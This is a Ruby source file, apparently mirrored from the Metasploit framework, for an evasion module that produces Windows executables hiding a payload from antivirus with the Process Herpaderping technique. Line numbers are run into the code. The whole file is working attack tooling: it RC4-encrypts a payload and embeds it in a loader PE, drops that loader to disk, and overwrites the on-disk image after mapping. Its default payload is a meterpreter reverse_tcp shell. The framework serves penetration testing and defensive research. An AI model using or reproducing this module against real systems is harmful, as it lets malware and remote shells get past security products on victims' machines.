CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/evasion/windows/process_herpaderping.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'metasploit/framework/compiler/windows'67class MetasploitModule < Msf::Evasion89# These constants must match the constants defined in the PE loader code (ProcessHerpaderpingTemplate.cpp)10MAX_JUNK_SIZE = 102411MAX_PAYLOAD_SIZE = 819212MAX_KEY_SIZE = 641314def initialize(info = {})15super(16merge_info(17info,18'Name' => 'Process Herpaderping evasion technique',19'Description' => %q{20This module allows you to generate a Windows executable that evades security21products such as Windows Defender, Avast, etc. This uses the Process22Herpaderping technique to bypass Antivirus detection. This method consists in23obscuring the behavior of a running process by modifying the executable on disk24after the image has been mapped in memory (more details https://jxy-s.github.io/herpaderping/).2526First, the chosen payload is encrypted and embedded in a loader Portable27Executable (PE) file. This file is then included in the final executable. Once28this executable is launched on the target, the loader PE is dropped on disk and29executed, following the Process Herpaderping technique. Note that the name of30the file that is being dropped is randomly generated. However, it is possible31to configure the destination path from Metasploit (see WRITEABLE_DIR option32description).3334Here is the main workflow:351. Retrieve the target name (where the PE loader will be dropped).362. Retrieve the PE loader from the binary and write it on disk.373. Create a section object and create a process from the mapped image.384. Modify the file content on disk by copying another (inoffensive) executable39or by using random bytes (see REPLACED_WITH_FILE option description).405. Create the main Thread.4142The source code is based on Johnny Shaw's PoC (https://github.com/jxy-s/herpaderping).43},44'Author' => [45'Johnny Shaw', # Research and PoC46'Christophe De La Fuente' # MSF Module47],48'License' => MSF_LICENSE,49'References' => [50[ 'URL', 'https://jxy-s.github.io/herpaderping/' ],51[ 'URL', 'https://github.com/jxy-s/herpaderping' ],52],53'Platform' => 'windows',54'Arch' => [ ARCH_X64, ARCH_X86 ],55'Payload' => { 'ForceEncode' => true },56'Targets' => [57[58'Microsoft Windows (x64)',59{60'Arch' => ARCH_X64,61'DefaultOptions' => {62'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'63}64}65],66[67'Microsoft Windows (x86)',68{69'Arch' => ARCH_X86,70'DefaultOptions' => {71'PAYLOAD' => 'windows/meterpreter/reverse_tcp'72}73}74]75]76)77)7879register_options([80OptString.new('ENCODER', [81false,82'A specific encoder to use (automatically selected if not set)',83nil84]),85OptString.new('WRITEABLE_DIR', [86true,87'Where to write the loader on disk',88'%TEMP%'89]),90OptString.new('REPLACED_WITH_FILE', [91false,92'File to replace the target with. If not set, the target file will be '\93'filled with random bytes (WARNING! it is likely to be caught by AV).',94'%SystemRoot%\\System32\\calc.exe'95])96])97end9899def patch_binary(bin, tag, value)100placeholder = bin.index(tag)101unless placeholder102fail_with(Failure::BadConfig, "Invalid source binary: missing \"#{tag}\" tag")103end104105bin[placeholder, value.size] = value106nil107end108109def encrypt_payload110opts = { format: 'rc4', key: rc4_key }111junk = Rex::Text.rand_text(10..MAX_JUNK_SIZE)112p = payload.encoded + junk113vprint_status("Payload size: #{p.size} = #{payload.encoded.size} + #{junk.size} (junk)")114Msf::Simple::Buffer.transform(p, 'raw', nil, opts)115end116117def rc4_key118@rc4_key ||= Rex::Text.rand_text_alpha(32..MAX_KEY_SIZE)119end120121def run122case target.arch.first123when ARCH_X64124arch_suffix = 'x64'125when ARCH_X86126arch_suffix = 'x86'127end128129payload = generate_payload130if payload.encoded.size > MAX_PAYLOAD_SIZE131fail_with(Failure::BadConfig,132"Payload too big: #{payload.encoded.size} bytes (max: #{MAX_PAYLOAD_SIZE})")133end134135base_path = ::File.join(136Msf::Config.data_directory,137'evasion',138'windows',139'process_herpaderping'140)141exe_path = ::File.join(base_path, "ProcessHerpaderping_#{arch_suffix}.exe")142exe_path = ::File.expand_path(exe_path)143pe = File.binread(exe_path)144vprint_status("Using #{exe_path}")145146template_path = ::File.join(base_path, "ProcessHerpaderpingTemplate_#{arch_suffix}.exe")147template_path = ::File.expand_path(template_path)148payload_pe = File.binread(template_path)149vprint_status("Using #{template_path}")150151patch_binary(payload_pe, 'ENCKEY', rc4_key)152153vprint_status("RC4 key: #{rc4_key}")154155encrypted_payload = encrypt_payload156vprint_status("Encrypted payload size: #{encrypted_payload.size}")157158size_prefix = [encrypted_payload.size].pack('L<')159patch_binary(payload_pe, 'PAYLOAD', (size_prefix + encrypted_payload).b)160vprint_status("Payload PE size #{payload_pe.size}")161162patch_binary(pe, 'PAYLOAD', payload_pe)163164target_file_name = Rex::Text.rand_text_alpha_lower(4..10)165target_path = datastore['WRITEABLE_DIR']166target_path << '\\' if target_path.last != '\\'167target_path << target_file_name168target_path << '.exe'169patch_binary(pe, 'TARGETFILENAME', target_path.b)170vprint_status("Target filename will be #{target_path}")171172replace_path = datastore['REPLACED_WITH_FILE']173if replace_path.nil? || replace_path.empty?174replace_path = "\0"175end176177patch_binary(pe, 'REPLACEFILENAME', replace_path.b)178179file_create(pe)180if arch_suffix == 'x86'181print_warning(182"#### WARNING ####\n"\183"This payload won't work on 32-bit Windows 10 versions from 1511 (build\n"\184"10586) to 1703 (build 15063), including Windows 10 2016 LTSB (build 14393).\n"\185"These versions have a bug in the kernel that crashes/BugCheck the OS\n"\186"when executing this payload. So, to avoid this, the payload won't run if\n"\187'it detects the OS is one of these versions.'188)189end190end191end192193194